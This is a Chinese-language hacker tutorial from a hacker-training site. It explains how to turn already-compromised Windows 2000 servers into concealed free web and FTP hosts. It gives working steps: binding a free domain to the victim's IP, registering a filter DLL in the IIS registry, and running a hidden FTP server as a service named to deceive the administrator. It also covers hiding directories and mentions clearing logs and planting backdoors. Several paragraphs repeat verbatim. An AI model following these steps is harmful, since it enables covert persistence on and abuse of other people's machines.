前一階段rpc溢出漏洞流行的時候,我相信許多黑友手頭上都儲備了大量的3389肉雞。大家都用肉雞來做什麼呢?做代理、做放黑軟的ftp服務器、做網站、還是試驗不同後門工具?更有無聊的人,像我整天用臺灣肉雞來申請QQ。好像這一切都玩得厭了,我來教大家玩一點新鮮的東東,用肉雞來構建一個完美的可以隱藏的免費虛擬主機。
什麼是虛擬主機呢?我在一家大規模的idc供應商的主頁上查到如下定義:虛擬主機是使用特殊的軟硬件技術,把一臺運行在INTERNET上的主機分成一臺臺"虛擬"的主機,每一臺虛擬主機都具有獨立的域名,具有完整的Internet服務器(WWW、FTP、E-mail等)功能,虛擬主機之間完全獨立,並可由用戶自行管理。明白了定義,我們開工吧,在肉雞上構建一個絲毫不遜於收費的虛擬主機。
第一,根據虛擬主機的定義,我們要有一個獨立的域名。當然,這個域名不是像my.126.com那樣的轉向域名,而是可以和肉雞ip地址綁定的域名。什麼是綁定暱?通俗一點講,像你有一個域名是www.hacker.com,那麼你網站內所有的網頁都可以用此域名指向表示,訪問論壇可以用http://www.hacker.com/bbs,訪問留言可以用http://www.hacker.com/guest,訪問你想設的地址可以用http://www.hacker.com/你想設的url目錄/等等。但是像126.com等的轉向域名就不可以了,像我網站的域名是http://haiyangtop.126.com,但我無論如何不能用http://haiyangtop.126.com/bbs指向我放在任何空間上的論壇。那麼獨立的域名如何得到呢,難道我們要去買國際域名嗎?不用的,可綁定的免費域名可以申請到的,請跟我來,打開http://www.ns.tc網站,點頁面左欄的sign up now,申請一個你喜歡的域名吧。我申請的是lcx.ns.tc。
什麼是虛擬主機呢?我在一家大規模的idc供應商的主頁上查到如下定義:虛擬主機是使用特殊的軟硬件技術,把一臺運行在INTERNET上的主機分成一臺臺"虛擬"的主機,每一臺虛擬主機都具有獨立的域名,具有完整的Internet服務器(WWW、FTP、E-mail等)功能,虛擬主機之間完全獨立,並可由用戶自行管理。明白了定義,我們開工吧,在肉雞上構建一個絲毫不遜於收費的虛擬主機。
第一,根據虛擬主機的定義,我們要有一個獨立的域名。當然,這個域名不是像my.126.com那樣的轉向域名,而是可以和肉雞ip地址綁定的域名。什麼是綁定暱?通俗一點講,像你有一個域名是www.hacker.com,那麼你網站內所有的網頁都可以用此域名指向表示,訪問論壇可以用http://www.hacker.com/bbs,訪問留言可以用http://www.hacker.com/guest,訪問你想設的地址可以用http://www.hacker.com/你想設的url目錄/等等。但是像126.com等的轉向域名就不可以了,像我網站的域名是http://haiyangtop.126.com,但我無論如何不能用http://haiyangtop.126.com/bbs指向我放在任何空間上的論壇。那麼獨立的域名如何得到呢,難道我們要去買國際域名嗎?不用的,可綁定的免費域名可以申請到的,請跟我來,打開http://www.ns.tc網站,點頁面左欄的sign up now,申請一個你喜歡的域名吧。我申請的是lcx.ns.tc。
。不過要提醒你的是,申請的時候,最好不要用163.net的郵箱,會收不到發給你的密碼的。我就申請了一個hacker.ns.tc的域名,註冊是成功了,但卻沒有收到信,一個很好的域名做廢了。申請成功後,用ns.tc發給你郵箱裏的的密碼登陸,在登陸後的頁面裏,寫入你的一個肉雞ip地址,點“renewal of an ip adress"按扭提交。
大約過幾小時後,此綁定的域名就生效了,此時打開這個域名,會指向肉雞的原有默認網站地址。我們當然不希望這樣,申請的域名要指向自己放在肉雞上的網站纔可以呀。我們的工具主角登場了,銀色巢穴有一款域名綁定軟件,下載地址是:http://www.yscx.net/list.asp?id=71。我們先將此軟件壓縮包裏的一個fmulti.dll和一個ff1.exe都傳在肉雞的%systemroot%system32目錄下,記住一定要在這個目錄下,這軟件使用後纔會生效;然後在肉雞的註冊表的HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters下,把Filter DLLs修改成爲fmulti.dll的地址。
修改完後,再打開ff1.exe,在由上到下的輸入框裏依次填入域名、域名、你要放網站的目錄。像我寫的就是lcx.ns.tc、lcx.ns.tc和c:\winnt\system32\lcx。
輸入完畢,用net命令重新啓動一下W3SVC。
一切做完後,我在c:\winnt\system32\lcx目錄下建一個default.htm默認首頁,此首頁的內容就是我網站的首頁了,此時再打開lcx.ns.tc,你會發現什麼?哈哈,一個綁定空間的域名生效了。在c:\winnt\system32\lcx這個目錄下,我就可以放置我想放置的內容了。假如我放了一個動網論壇,位置是c:\winnt\system32\lcx\dwbbs,那麼我就可以用http://lcx.ns.tc/dwbbs/index.asp直接來訪問此論壇,這樣訪問是不是比你用轉向域 名跳轉後在ie地址欄裏顯示一大串的url地址酷很多?當然,要說明的是,我們在做這一切的前提是肉雞是w2k系統,默認裝了iis管理器,並且開了一個80端口的web服務,只有這樣,我們做的綁定域名纔會有效,而且我們做的虛擬主機是支持asp程序的。
第二,根據虛擬主機的定義,我們做的虛擬主機還要具有完整的Internet服務器(WWW、FTP、E-mail等)功能。此時,我們的lcx.ns.tc虛擬主機已具備了www的功能,你可以用http://lcx.ns.tc訪問到的。我們再給其做上一個ftp功能,這個虛擬主機就很完美了。hotmail寫了一個很小的ftp服務器TinyFTPD,目前最高版本是1.4。不過,它只是一個命令行的工具,在肉雞上配置使用過後,如果再退出了肉雞的話,它就不會生效了。我們還需要一個工具ntsrv,將TinyFTPD配置成服務狀態來使用。我們先來了解一下TinyFTPD是如何工作的,我們將其傳在肉雞上,執行如下命令:TinyFTPD 2121 55555 lcx 12346 c:\winnt\system32\lcx all -hide。意思是說在肉雞上建了一個ftp服務器,端口是2121,監聽端口是55555,用戶名是lcx,密碼是123456,ftp的服務器目錄是c:\winnt\system32\lcx(這裏要和lcx.ns.tc的www目錄對應,這樣纔會有虛擬主機的味道),all是具有所有的寫入修改刪除下載等權限,-hide指關掉cmd對話框該命令仍然執行。(詳細使用方法請自行看幫助吧)。
第二,根據虛擬主機的定義,我們做的虛擬主機還要具有完整的Internet服務器(WWW、FTP、E-mail等)功能。此時,我們的lcx.ns.tc虛擬主機已具備了www的功能,你可以用http://lcx.ns.tc訪問到的。我們再給其做上一個ftp功能,這個虛擬主機就很完美了。hotmail寫了一個很小的ftp服務器TinyFTPD,目前最高版本是1.4。不過,它只是一個命令行的工具,在肉雞上配置使用過後,如果再退出了肉雞的話,它就不會生效了。我們還需要一個工具ntsrv,將TinyFTPD配置成服務狀態來使用。我們先來了解一下TinyFTPD是如何工作的,我們將其傳在肉雞上,執行如下命令:TinyFTPD 2121 55555 lcx 12346 c:\winnt\system32\lcx all -hide。意思是說在肉雞上建了一個ftp服務器,端口是2121,監聽端口是55555,用戶名是lcx,密碼是123456,ftp的服務器目錄是c:\winnt\system32\lcx(這裏要和lcx.ns.tc的www目錄對應,這樣纔會有虛擬主機的味道),all是具有所有的寫入修改刪除下載等權限,-hide指關掉cmd對話框該命令仍然執行。(詳細使用方法請自行看幫助吧)。
明白了這些,我再來講解用ntsrv將TinyFTPD命令如何來配置成服務啓動。我們先來用記事本寫一個ntsrv.ini,內容如下:
[Settings]
ServiceName = NETWORK JAVA
LogEnable = 0
ProcCount = 1
[Process0]
CommandLine =TinyFTPD.exe 21 55555 lcx 12346 C:\winnt\system32\lcx all -hide
PauseStart = 1000
PauseEnd = 1000
UserInterface = No
第二行的NETWORK JAVA指的是你指定的服務名,你可以起個更藝術的可以迷惑肉雞管理員的服務名字,使其不敢輕易刪掉此服務。第三行的LogEnable = 0中的0表示程序不會自動生成一個日誌,如果是1就會生成一個叫ntsrv.log的文件,裏面記錄了服務啓動及啓動配置文件中的程序情況。第三行ProcCount = 1表示只有一個程序加載在服務裏。第六行你已經明白了,最後一行表示程序執行時會在後臺被執行,其它行一切默認即可以了。ntsrv.ini配置好了以後,我們與ntsrv.exe放在一起一塊傳至肉雞的c:\winnt\system32下,執行ntsrv -install、net start "你在ntsrv.ini配置的服務名"這兩個命令後,肉雞的ftp服務器配置好了。
[Settings]
ServiceName = NETWORK JAVA
LogEnable = 0
ProcCount = 1
[Process0]
CommandLine =TinyFTPD.exe 21 55555 lcx 12346 C:\winnt\system32\lcx all -hide
PauseStart = 1000
PauseEnd = 1000
UserInterface = No
第二行的NETWORK JAVA指的是你指定的服務名,你可以起個更藝術的可以迷惑肉雞管理員的服務名字,使其不敢輕易刪掉此服務。第三行的LogEnable = 0中的0表示程序不會自動生成一個日誌,如果是1就會生成一個叫ntsrv.log的文件,裏面記錄了服務啓動及啓動配置文件中的程序情況。第三行ProcCount = 1表示只有一個程序加載在服務裏。第六行你已經明白了,最後一行表示程序執行時會在後臺被執行,其它行一切默認即可以了。ntsrv.ini配置好了以後,我們與ntsrv.exe放在一起一塊傳至肉雞的c:\winnt\system32下,執行ntsrv -install、net start "你在ntsrv.ini配置的服務名"這兩個命令後,肉雞的ftp服務器配置好了。
(附此兩個小工具的下載地址:http://haiyangtop.uni.cc/xnzj.rar)
第三,收尾工作。我們的lcx.ns.tc的虛擬主機已經配置完畢了,如果你想再做上一個email服務器也不是不可以的,網上也有很多小巧精緻的email服務器軟件,像IMailt和EasyMail、ArGoSoft等等,但我覺得已經沒有必要了,這個虛擬主機足夠我們用的了。做完了虛擬主機,當然隨之而來的工作是清除日誌,打好肉雞安全隱患的補丁,再留幾個好後門了,最重要的是隱藏好你的網站目錄,一般用一個"attrib +h +s 你的目錄"就可以隱藏了,但這一切就不在本文的討論範圍之內了。最後,我可要提醒你,如果你有重要文件放在肉雞的虛擬主機上,可以記得經常備份喲,丟了的話lcx可不負責。
本篇文章來源於[華盟***帝國 - 中國最權威***培訓中心], 原文鏈接:http://www.hm112.com/n/?15831.html
第三,收尾工作。我們的lcx.ns.tc的虛擬主機已經配置完畢了,如果你想再做上一個email服務器也不是不可以的,網上也有很多小巧精緻的email服務器軟件,像IMailt和EasyMail、ArGoSoft等等,但我覺得已經沒有必要了,這個虛擬主機足夠我們用的了。做完了虛擬主機,當然隨之而來的工作是清除日誌,打好肉雞安全隱患的補丁,再留幾個好後門了,最重要的是隱藏好你的網站目錄,一般用一個"attrib +h +s 你的目錄"就可以隱藏了,但這一切就不在本文的討論範圍之內了。最後,我可要提醒你,如果你有重要文件放在肉雞的虛擬主機上,可以記得經常備份喲,丟了的話lcx可不負責。
本篇文章來源於[華盟***帝國 - 中國最權威***培訓中心], 原文鏈接:http://www.hm112.com/n/?15831.html